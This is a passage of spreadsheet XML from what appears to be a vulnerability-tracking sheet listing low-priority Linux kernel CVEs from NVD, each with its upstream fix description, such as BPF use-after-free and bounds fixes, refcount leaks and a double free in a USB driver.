another for the DL channel after allocating the transfer device. These
references are normally released by mhi_ep_destroy_device() before the
device itself is removed.
If dev_set_name() or device_add() fails, the error path currently drops
only one reference. The remaining channel references keep the device
from being released and leave the channels associated with a device that
was never registered.
Route both failures through a common unwind path that drops the DL
channel reference, the UL channel reference, and the initial reference
from device_initialize().</t>
        </is>
      </c>
      <c r="T952" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93136</t>
        </is>
      </c>
    </row>
    <row r="953">
      <c r="A953" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B953" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C953" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93137</t>
        </is>
      </c>
      <c r="D953" s="5" t="inlineStr"/>
      <c r="E953" s="5" t="inlineStr"/>
      <c r="F953" s="5" t="inlineStr"/>
      <c r="G953" s="5" t="inlineStr"/>
      <c r="H953" s="5" t="inlineStr"/>
      <c r="I953" s="5" t="inlineStr"/>
      <c r="J953" s="5" t="inlineStr"/>
      <c r="K953" s="5" t="inlineStr"/>
      <c r="L953" s="5" t="inlineStr"/>
      <c r="M953" s="5" t="inlineStr"/>
      <c r="N953" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O953" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P953" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q953" s="5" t="inlineStr"/>
      <c r="R953" s="5" t="inlineStr"/>
      <c r="S953" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Fix use-after-free on mm_struct in bpf_find_vma()
bpf_find_vma() reads task-&gt;mm and calls mmap_read_trylock(mm) without
holding a reference on the mm. On a foreign task, a concurrent exit_mm()
can free the mm_struct between the lockless read and the trylock,
resulting in a use-after-free. mm_struct is not SLAB_TYPESAFE_BY_RCU.
For the current task, task-&gt;mm is stable. For a foreign task, pin the mm
under task-&gt;alloc_lock and release it with mmput_async(), mirroring commit
d8e27d2d22b6 ("bpf: fix mm lifecycle in open-coded task_vma iterator").
Use spin_trylock() instead of get_task_mm() so BPF context does not block
on alloc_lock. Reject irqs-disabled contexts and !CONFIG_MMU on the
foreign-task path because dropping the mm reference is not safe there.
Race:
  CPU0 (BPF program)                  CPU1 (exiting task)
  ============================        ==========================
  bpf_find_vma(foreign_task):
    mm = task-&gt;mm
                                      exit_mm():
                                        task-&gt;mm = NULL
                                        mmput(mm) -&gt; frees mm_struct
    mmap_read_trylock(mm)
        // UAF on mm</t>
        </is>
      </c>
      <c r="T953" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93137</t>
        </is>
      </c>
    </row>
    <row r="954">
      <c r="A954" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B954" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C954" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93138</t>
        </is>
      </c>
      <c r="D954" s="5" t="inlineStr"/>
      <c r="E954" s="5" t="inlineStr"/>
      <c r="F954" s="5" t="inlineStr"/>
      <c r="G954" s="5" t="inlineStr"/>
      <c r="H954" s="5" t="inlineStr"/>
      <c r="I954" s="5" t="inlineStr"/>
      <c r="J954" s="5" t="inlineStr"/>
      <c r="K954" s="5" t="inlineStr"/>
      <c r="L954" s="5" t="inlineStr"/>
      <c r="M954" s="5" t="inlineStr"/>
      <c r="N954" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O954" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P954" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q954" s="5" t="inlineStr"/>
      <c r="R954" s="5" t="inlineStr"/>
      <c r="S954" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Fix vmlinux BTF prep race in bpf_get_btf_vmlinux
bpf_get_btf_vmlinux() lazily parses the vmlinux BTF under the
bpf_verifier_lock, but publishes the result through a plain store
and re-checks it through a plain lockless load. Nothing orders
the stores initializing the struct btf inside btf_parse_vmlinux()
against the store publishing the pointer: On a weakly ordered
arch, a concurrent first-time caller taking the lockless fast
path could in principle observe the pointer before the parsed
contents are visible. The mutex_unlock() does not help such a
reader given it only synchronizes with a later acquisition of the
same lock. Thus, publish the pointer with smp_store_release()
and read it on the fast path with smp_load_acquire().
Acquire semantics are needed rather than a dependency-ordered
READ_ONCE(): btf_parse_vmlinux() also populates globals outside
the returned object (e.g. bpf_ctx_convert.t). An address
dependency would only order accesses performed through the
pointer and not cover other globals.</t>
        </is>
      </c>
      <c r="T954" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93138</t>
        </is>
      </c>
    </row>
    <row r="955">
      <c r="A955" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B955" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C955" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93139</t>
        </is>
      </c>
      <c r="D955" s="5" t="inlineStr"/>
      <c r="E955" s="5" t="inlineStr"/>
      <c r="F955" s="5" t="inlineStr"/>
      <c r="G955" s="5" t="inlineStr"/>
      <c r="H955" s="5" t="inlineStr"/>
      <c r="I955" s="5" t="inlineStr"/>
      <c r="J955" s="5" t="inlineStr"/>
      <c r="K955" s="5" t="inlineStr"/>
      <c r="L955" s="5" t="inlineStr"/>
      <c r="M955" s="5" t="inlineStr"/>
      <c r="N955" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O955" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P955" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q955" s="5" t="inlineStr"/>
      <c r="R955" s="5" t="inlineStr"/>
      <c r="S955" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/amdgpu/mes: Fix hung_queue_db_array loop limit for multi-XCC
The loop iterated only AMDGPU_MAX_MES_PIPES times, leaving entries
uninitialized for multi-XCC GPUs. This causes null pointer dereferences
when accessing arrays indexed by XCC ID &gt;= 2. Extend the loop to cover
all XCCs (AMDGPU_MAX_MES_PIPES * num_xcc), matching other per-XCC
arrays.</t>
        </is>
      </c>
      <c r="T955" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93139</t>
        </is>
      </c>
    </row>
    <row r="956">
      <c r="A956" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B956" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C956" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-9314</t>
        </is>
      </c>
      <c r="D956" s="5" t="inlineStr"/>
      <c r="E956" s="5" t="inlineStr"/>
      <c r="F956" s="5" t="inlineStr"/>
      <c r="G956" s="5" t="inlineStr"/>
      <c r="H956" s="5" t="inlineStr"/>
      <c r="I956" s="5" t="inlineStr"/>
      <c r="J956" s="5" t="inlineStr"/>
      <c r="K956" s="5" t="inlineStr"/>
      <c r="L956" s="5" t="inlineStr"/>
      <c r="M956" s="5" t="inlineStr"/>
      <c r="N956" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O956" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P956" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q956" s="5" t="inlineStr"/>
      <c r="R956" s="5" t="inlineStr"/>
      <c r="S956" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t>
        </is>
      </c>
      <c r="T956" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-9314</t>
        </is>
      </c>
    </row>
    <row r="957">
      <c r="A957" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B957" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C957" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93140</t>
        </is>
      </c>
      <c r="D957" s="5" t="inlineStr"/>
      <c r="E957" s="5" t="inlineStr"/>
      <c r="F957" s="5" t="inlineStr"/>
      <c r="G957" s="5" t="inlineStr"/>
      <c r="H957" s="5" t="inlineStr"/>
      <c r="I957" s="5" t="inlineStr"/>
      <c r="J957" s="5" t="inlineStr"/>
      <c r="K957" s="5" t="inlineStr"/>
      <c r="L957" s="5" t="inlineStr"/>
      <c r="M957" s="5" t="inlineStr"/>
      <c r="N957" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O957" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P957" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q957" s="5" t="inlineStr"/>
      <c r="R957" s="5" t="inlineStr"/>
      <c r="S957" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
udf: Mark LVID buffer as uptodate before marking it dirty
When an I/O error occurs while writing the Logical Volume Integrity
Descriptor (LVID) buffer to the block device, the block layer's completion
handler (`end_buffer_write_sync()`) clears the `BH_Uptodate` flag on the
buffer. However, the buffer still contains valid LVID data in memory. If
the filesystem is subsequently remounted read-write or synced,
`udf_open_lvid()` or `udf_sync_fs()` will modify the LVID buffer and call
`mark_buffer_dirty()`. This triggers a spurious
`WARN_ON_ONCE(!buffer_uptodate(bh))` warning in `mark_buffer_dirty()`
because the buffer is not marked uptodate, even though its in-memory
contents are valid and are about to be overwritten.
To prevent this spurious warning, unconditionally set the `BH_Uptodate`
flag before calling `mark_buffer_dirty()` in `udf_open_lvid()` and
`udf_sync_fs()`. This acknowledges that the in-memory buffer is valid and
matches the workaround previously applied to `udf_close_lvid()` in commit
853a0c25baf9 ("udf: Mark LVID buffer as uptodate before marking it dirty").
Extending this workaround ensures consistent behavior across all LVID
updates.
Buffer I/O error on dev loop0, logical block 128, lost sync page write
------------[ cut here ]------------
!buffer_uptodate(bh)
WARNING: fs/buffer.c:1087 at mark_buffer_dirty+0x299/0x410 fs/buffer.c:1087
...
Call Trace:
 &lt;TASK&gt;
 udf_open_lvid+0x369/0x5b0 fs/udf/super.c:2078
 udf_reconfigure+0x336/0x540 fs/udf/super.c:679
 reconfigure_super+0x232/0x8f0 fs/super.c:1080
 vfs_cmd_reconfigure fs/fsopen.c:268 [inline]
 vfs_fsconfig_locked+0x171/0x320 fs/fsopen.c:297
 __do_sys_fsconfig fs/fsopen.c:463 [inline]
 __se_sys_fsconfig+0x6b9/0x810 fs/fsopen.c:350
 do_syscall_64+0x174/0x580 arch/x86/entry/syscall_64.c:94
 &lt;/TASK&gt;</t>
        </is>
      </c>
      <c r="T957" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93140</t>
        </is>
      </c>
    </row>
    <row r="958">
      <c r="A958" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B958" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C958" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93141</t>
        </is>
      </c>
      <c r="D958" s="5" t="inlineStr"/>
      <c r="E958" s="5" t="inlineStr"/>
      <c r="F958" s="5" t="inlineStr"/>
      <c r="G958" s="5" t="inlineStr"/>
      <c r="H958" s="5" t="inlineStr"/>
      <c r="I958" s="5" t="inlineStr"/>
      <c r="J958" s="5" t="inlineStr"/>
      <c r="K958" s="5" t="inlineStr"/>
      <c r="L958" s="5" t="inlineStr"/>
      <c r="M958" s="5" t="inlineStr"/>
      <c r="N958" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O958" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P958" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q958" s="5" t="inlineStr"/>
      <c r="R958" s="5" t="inlineStr"/>
      <c r="S958" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
usb: gadget: r8a66597: avoid double free of ep0_req in probe error path
If usb_add_gadget_udc() fails, r8a66597_probe() jumps to err_add_udc
and frees ep0_req, then falls through to clean_up2 where ep0_req is
freed again when it is non-NULL.
Remove the redundant free from err_add_udc and keep the cleanup in
clean_up2 so the request is released exactly once.
Issue found using a prototype static analysis tool
and confirmed by code review.</t>
        </is>
      </c>
      <c r="T958" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93141</t>
        </is>
      </c>
    </row>
    <row r="959">
      <c r="A959" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B959" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C959" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93142</t>
        </is>
      </c>
      <c r="D959" s="5" t="inlineStr"/>
      <c r="E959" s="5" t="inlineStr"/>
      <c r="F959" s="5" t="inlineStr"/>
      <c r="G959" s="5" t="inlineStr"/>
      <c r="H959" s="5" t="inlineStr"/>
      <c r="I959" s="5" t="inlineStr"/>
      <c r="J959" s="5" t="inlineStr"/>
      <c r="K959" s="5" t="inlineStr"/>
      <c r="L959" s="5" t="inlineStr"/>
      <c r="M959" s="5" t="inlineStr"/>
      <c r="N959" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O959" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P959" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q959" s="5" t="inlineStr"/>
      <c r="R959" s="5" t="inlineStr"/>
      <c r="S959" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
thermal/drivers/rcar: Fix error checking in probe()
This code accidentally calls thermal_zone_device_enable() before checking
whether thermal_zone_device_register_with_trips() failed.  Move the call
until later to avoid an error pointer dereference of "priv-&gt;zone".
The driver works differently depending on if we are using OF thermal or
not.  We use thermal_add_hwmon_sysfs() if we are using OF thermal and
call thermal_zone_device_enable() if not.  We can share same error check
for if either of these fail.
Moving the thermal_zone_device_enable() call is a bit cleaner as well.
The original code used a three step process to cleanup:
1. Call thermal_zone_device_unregister() to cleanup.
2. Set priv-&gt;zone to an error pointer to preserve the error code.
3. Set priv-&gt;zone to NULL to avoid a second call to
   thermal_zone_device_unregister() in the rcar_thermal_remove()
   function.
Now we can just do a direct goto error_unregister and rcar_thermal_remove()
handles the cleanup properly.</t>
        </is>
      </c>
      <c r="T959" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93142</t>
        </is>
      </c>
    </row>
    <row r="960">
      <c r="A960" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B960" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C960" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93143</t>
        </is>
      </c>
      <c r="D960" s="5" t="inlineStr"/>
      <c r="E960" s="5" t="inlineStr"/>
      <c r="F960" s="5" t="inlineStr"/>
      <c r="G960" s="5" t="inlineStr"/>
      <c r="H960" s="5" t="inlineStr"/>
      <c r="I960" s="5" t="inlineStr"/>
      <c r="J960" s="5" t="inlineStr"/>
      <c r="K960" s="5" t="inlineStr"/>
      <c r="L960" s="5" t="inlineStr"/>
      <c r="M960" s="5" t="inlineStr"/>
      <c r="N960" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O960" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P960" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q960" s="5" t="inlineStr"/>
      <c r="R960" s="5" t="inlineStr"/>
      <c r="S960" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
staging: media: ipu7: fix pm_runtime refcount leak in ipu7_resume()
ipu7_resume() calls pm_runtime_get_sync() before resuming the device.
If the runtime PM resume fails, the usage count remains incremented, but
the error path returns without dropping the reference.
Use pm_runtime_resume_and_get() instead, which balances the usage count
on failure and avoids the leak. Keep returning 0 on error, as resume
callbacks should not propagate failures to the PM core, matching the
behaviour of the ipu6 driver.</t>
        </is>
      </c>
      <c r="T960" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93143</t>
        </is>
      </c>
    </row>
    <row r="961">
      <c r="A961" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B961" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C961" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93144</t>
        </is>
      </c>
      <c r="D961" s="5" t="inlineStr"/>
      <c r="E961" s="5" t="inlineStr"/>
      <c r="F961" s="5" t="inlineStr"/>
      <c r="G961" s="5" t="inlineStr"/>
      <c r="H961" s="5" t="inlineStr"/>
      <c r="I961" s="5" t="inlineStr"/>
      <c r="J961" s="5" t="inlineStr"/>
      <c r="K961" s="5" t="inlineStr"/>
      <c r="L961" s="5" t="inlineStr"/>
      <c r="M961" s="5" t="inlineStr"/>
      <c r="N961" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O961" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P961" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q961" s="5" t="inlineStr"/>
      <c r="R961" s="5" t="inlineStr"/>
      <c r="S961" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Reject writes through untrusted BTF pointers
check_ptr_to_btf_access() lets program-type btf_struct_access callbacks
validate writes before the default BTF access path rejects non-read
accesses. That bypasses the read-only policy for untrusted BTF pointers
created by helpers such as bpf_rdonly_cast().
Reject non-read accesses through PTR_UNTRUSTED BTF pointers at the
common entry point, before the callback branch to handle all cases.</t>
        </is>
      </c>
      <c r="T961" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93144</t>
        </is>
      </c>
    </row>
    <row r="962">
      <c r="A962" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B962" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C962" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93145</t>
        </is>
      </c>
      <c r="D962" s="5" t="inlineStr"/>
      <c r="E962" s="5" t="inlineStr"/>
      <c r="F962" s="5" t="inlineStr"/>
      <c r="G962" s="5" t="inlineStr"/>
      <c r="H962" s="5" t="inlineStr"/>
      <c r="I962" s="5" t="inlineStr"/>
      <c r="J962" s="5" t="inlineStr"/>
      <c r="K962" s="5" t="inlineStr"/>
      <c r="L962" s="5" t="inlineStr"/>
      <c r="M962" s="5" t="inlineStr"/>
      <c r="N962" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O962" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P962" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q962" s="5" t="inlineStr"/>
      <c r="R962" s="5" t="inlineStr"/>
      <c r="S962" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
clk: qcom: gdsc: tear down per-domain genpds in gdsc_unregister()
gdsc_unregister() removes the OF provider entry and tears down the
parent/subdomain wiring, but never calls pm_genpd_remove() on the
individual generic_pm_domain structures registered by gdsc_init():
	void gdsc_unregister(struct gdsc_desc *desc)
	{
		struct device *dev = desc-&gt;dev;
		size_t num = desc-&gt;num;
		gdsc_pm_subdomain_remove(desc, num);
		of_genpd_del_provider(dev-&gt;of_node);
	}
That leaves dangling entries on the global gpd_list. After a provider
unbind/rebind cycle (deferred-probe replay during early boot, real
module unload of a clk driver that owns GDSCs, or an OF-overlay tear-
down) the next gdsc_init() will end up trying to re-register a name
that is still in the list and pm_genpd_init() returns -EEXIST.
While we are here, flip the order so the consumer-facing OF provider
entry is the first thing removed -- otherwise a fresh
of_genpd_get_from_provider() call racing with the teardown could
attach to a domain that is mid-removal.
Iterate the scs[] array and pm_genpd_remove() each registered domain
after the subdomain links are torn down. The regulators stay devm-
managed (devm_regulator_get_optional() in gdsc_register()), so the
release happens automatically when the underlying device is unbound;
just the genpd accounting needs to be undone explicitly.</t>
        </is>
      </c>
      <c r="T962" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93145</t>
        </is>
      </c>
    </row>
    <row r="963">
      <c r="A963" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B963" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C963" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93146</t>
        </is>
      </c>
      <c r="D963" s="5" t="inlineStr"/>
      <c r="E963" s="5" t="inlineStr"/>
      <c r="F963" s="5" t="inlineStr"/>
      <c r="G963" s="5" t="inlineStr"/>
      <c r="H963" s="5" t="inlineStr"/>
      <c r="I963" s="5" t="inlineStr"/>
      <c r="J963" s="5" t="inlineStr"/>
      <c r="K963" s="5" t="inlineStr"/>
      <c r="L963" s="5" t="inlineStr"/>
      <c r="M963" s="5" t="inlineStr"/>
      <c r="N963" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O963" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P963" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q963" s="5" t="inlineStr"/>
      <c r="R963" s="5" t="inlineStr"/>
      <c r="S963" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
time/namespace: Validate nanosecond field in proc_timens_set_offset()
The function validates tv_sec to be within [-KTIME_SEC_MAX, KTIME_SEC_MAX]
but never validates that tv_nsec is within the valid range of
[0, NSEC_PER_SEC-1] before using it in timespec64_add().
timespec64_add() expects both timespec64 structures to have normalized
values with tv_nsec in the range [0, 999999999]. If off-&gt;val.tv_nsec
contains invalid values (negative or &gt;= NSEC_PER_SEC), it could lead to
incorrect calculations or unexpected behavior.
Add validation to ensure tv_nsec is within the valid range before
performing the addition.</t>
        </is>
      </c>
      <c r="T963" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93146</t>
        </is>
      </c>
    </row>
    <row r="964">
      <c r="A964" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B964" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C964" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93147</t>
        </is>
      </c>
      <c r="D964" s="5" t="inlineStr"/>
      <c r="E964" s="5" t="inlineStr"/>
      <c r="F964" s="5" t="inlineStr"/>
      <c r="G964" s="5" t="inlineStr"/>
      <c r="H964" s="5" t="inlineStr"/>
      <c r="I964" s="5" t="inlineStr"/>
      <c r="J964" s="5" t="inlineStr"/>
      <c r="K964" s="5" t="inlineStr"/>
      <c r="L964" s="5" t="inlineStr"/>
      <c r="M964" s="5" t="inlineStr"/>
      <c r="N964" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O964" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P964" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q964" s="5" t="inlineStr"/>
      <c r="R964" s="5" t="inlineStr"/>
      <c r="S964" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
s390/bpf: Replace ly instruction with llgf
cpu_nr is a 32 bit value and BPF_REG_0 is a 64 bit register, when ly loads
the cpu_nr into BPF_REG_0 it does not zero the upper bits, but llgf does.</t>
        </is>
      </c>
      <c r="T964" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93147</t>
        </is>
      </c>
    </row>
    <row r="965">
      <c r="A965" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B965" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C965" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93148</t>
        </is>
      </c>
      <c r="D965" s="5" t="inlineStr"/>
      <c r="E965" s="5" t="inlineStr"/>
      <c r="F965" s="5" t="inlineStr"/>
      <c r="G965" s="5" t="inlineStr"/>
      <c r="H965" s="5" t="inlineStr"/>
      <c r="I965" s="5" t="inlineStr"/>
      <c r="J965" s="5" t="inlineStr"/>
      <c r="K965" s="5" t="inlineStr"/>
      <c r="L965" s="5" t="inlineStr"/>
      <c r="M965" s="5" t="inlineStr"/>
      <c r="N965" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O965" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P965" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q965" s="5" t="inlineStr"/>
      <c r="R965" s="5" t="inlineStr"/>
      <c r="S965" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Reject MEM_ALLOC BTF accesses past object bounds
BTF struct walks relax the struct-size check for accesses through a
trailing flexible array. That is valid for ordinary BTF type walking, but
PTR_TO_BTF_ID | MEM_ALLOC values point to objects allocated with the static
BTF type size.
When walking a MEM_ALLOC object, reject the access before applying the
flexible-array relaxation if the access range extends past the struct size.
Apply the same policy to struct ID matching so kfunc and kptr type checks
do not walk past the allocated object bounds either.</t>
        </is>
      </c>
      <c r="T965" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93148</t>
        </is>
      </c>
    </row>
    <row r="966">
      <c r="A966" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B966" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C966" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93149</t>
        </is>
      </c>
      <c r="D966" s="5" t="inlineStr"/>
      <c r="E966" s="5" t="inlineStr"/>
      <c r="F966" s="5" t="inlineStr"/>
      <c r="G966" s="5" t="inlineStr"/>
      <c r="H966" s="5" t="inlineStr"/>
      <c r="I966" s="5" t="inlineStr"/>
      <c r="J966" s="5" t="inlineStr"/>
      <c r="K966" s="5" t="inlineStr"/>
      <c r="L966" s="5" t="inlineStr"/>
      <c r="M966" s="5" t="inlineStr"/>
      <c r="N966" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O966" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P966" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q966" s="5" t="inlineStr"/>
      <c r="R966" s="5" t="inlineStr"/>
      <c r="S966" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
wifi: mac80211_hwsim: avoid NULL skb in stop queue drain
mac80211_hwsim_stop() drops any frames left in data-&gt;pending. The loop
currently checks skb_queue_empty() and then dequeues separately.
That split is racy with TX status handling, which can remove a pending
frame under the queue lock. If the last entry is removed after the empty
check, skb_dequeue() returns NULL and the stop path passes that NULL skb
to ieee80211_free_txskb().
Use skb_dequeue() as the loop condition instead. The dequeue result is the
object that stop owns and frees, and a concurrent status completion that
empties the queue simply makes the loop terminate.</t>
        </is>
      </c>
      <c r="T966" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93149</t>
        </is>
      </c>
    </row>
    <row r="967">
      <c r="A967" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B967" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C967" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93150</t>
        </is>
      </c>
      <c r="D967" s="5" t="inlineStr"/>
      <c r="E967" s="5" t="inlineStr"/>
      <c r="F967" s="5" t="inlineStr"/>
      <c r="G967" s="5" t="inlineStr"/>
      <c r="H967" s="5" t="inlineStr"/>
      <c r="I967" s="5" t="inlineStr"/>
      <c r="J967" s="5" t="inlineStr"/>
      <c r="K967" s="5" t="inlineStr"/>
      <c r="L967" s="5" t="inlineStr"/>
